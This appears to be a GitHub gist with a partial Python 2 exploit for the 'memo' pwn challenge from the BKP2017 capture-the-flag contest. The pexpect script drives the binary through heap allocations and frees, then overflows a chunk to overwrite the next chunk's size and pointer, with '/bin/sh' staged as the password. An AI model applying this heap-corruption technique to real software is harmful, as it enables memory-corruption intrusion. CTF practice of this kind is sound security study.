Skip to content

Instantly share code, notes, and snippets.

@P1kachu
Last active March 6, 2017 11:02
Show Gist options
  • Save P1kachu/7fca6528b96d91895bfb5466e2f4d1b4 to your computer and use it in GitHub Desktop.
Save P1kachu/7fca6528b96d91895bfb5466e2f4d1b4 to your computer and use it in GitHub Desktop.
First shot at exploiting memo (BKP2017 - pwn 300) (ipynb with gdb and py without)
Display the source blob
Display the rendered blob
Raw
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
#!/usr/bin/env python2
# Without gdb
import pexpect
import struct
import sys
p = pexpect.spawn('./memo')
p.logfile = sys.stdout
p.setecho(False)
# malloc pointer
# |
# slots: v
# malloc(1) = 0x603010 | 0x0 (8bytes) | 0x31 (8 bytes) | 0xDATA (32 bytes)
# malloc(2) = 0x603040 | 0x0 (8bytes) | 0x31 (8 bytes) | 0xDATA (32 bytes)
# free(2) | 0x0 (8bytes) | 0x31 (8 bytes) | 0xPREV (8 bytes) | 0xNEXT (8 bytes)
# free(1) | 0x0 (8bytes) | 0x31 (8 bytes) | 0xPREV (8 bytes) | 0xNEXT (8 bytes)
# malloc(1) = 0x603010 | 0x0 (8bytes) | 0x31 (8 bytes) | 0x424242...
# malloc(2) = 0x603040 | ...0x4242... (8 bytes) | ...0x4242... (8 bytes) | 0xDATA (32 bytes)
# malloc(0) = 0x424242.... | 0x0 (8bytes) | 0x1000 (8 bytes) | 0xDATA (LOT OF BYTES)
p.expect("What's user name:")
p.sendline("P1kachu")
p.expect("Do you wanna set password\? \(y/n\)")
p.sendline("y")
p.expect("Password: ")
p.sendline("/bin/sh")
p.expect(">> ")
SIZE=31
# alloc(1)
p.sendline("1")
p.expect("Index: ")
p.sendline("1")
p.expect("Length: ")
p.sendline(str(SIZE))
p.expect("Message: ")
p.sendline(SIZE * 'A')
p.expect(">> ")
# alloc(2)
p.sendline('1')
p.expect("Index: ")
p.sendline("2")
p.expect("Length: ")
p.sendline(str(SIZE))
p.expect("Message: ")
p.sendline(SIZE * 'A')
p.expect(">> ")
# free(2)
p.sendline('4')
p.expect("Index: ")
p.sendline("2")
p.expect(">> ")
# free(1)
p.sendline('4')
p.expect("Index: ")
p.sendline("1")
p.expect(">> ")
TOOMUCH=96
NEWSIZE=struct.pack("<Q", 0x20)
NEWPTR=struct.pack("<Q", 0x603060)
ZERO=struct.pack("<Q", 0)
# alloc(1)
p.sendline("1")
p.expect("Index: ")
p.sendline("1")
p.expect("Length: ")
p.sendline(str(TOOMUCH))
p.expect("message too long, you can leave on memo though")
p.sendline(0x20 * 'D' + ZERO + NEWSIZE + NEWPTR)
p.expect(">> ")
# alloc(2)
p.sendline("1")
p.expect("Index: ")
p.sendline("2")
p.expect("Length: ")
p.sendline(str(SIZE))
p.expect("Message: ")
p.sendline(SIZE * 'A')
p.expect(">> ")
# alloc(0)
p.sendline('1')
p.expect("Index: ")
p.sendline("0")
p.expect("Length: ")
p.sendline(str(SIZE))
p.expect("Message: ")
p.sendline(SIZE * 'A')
p.expect(">> ")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment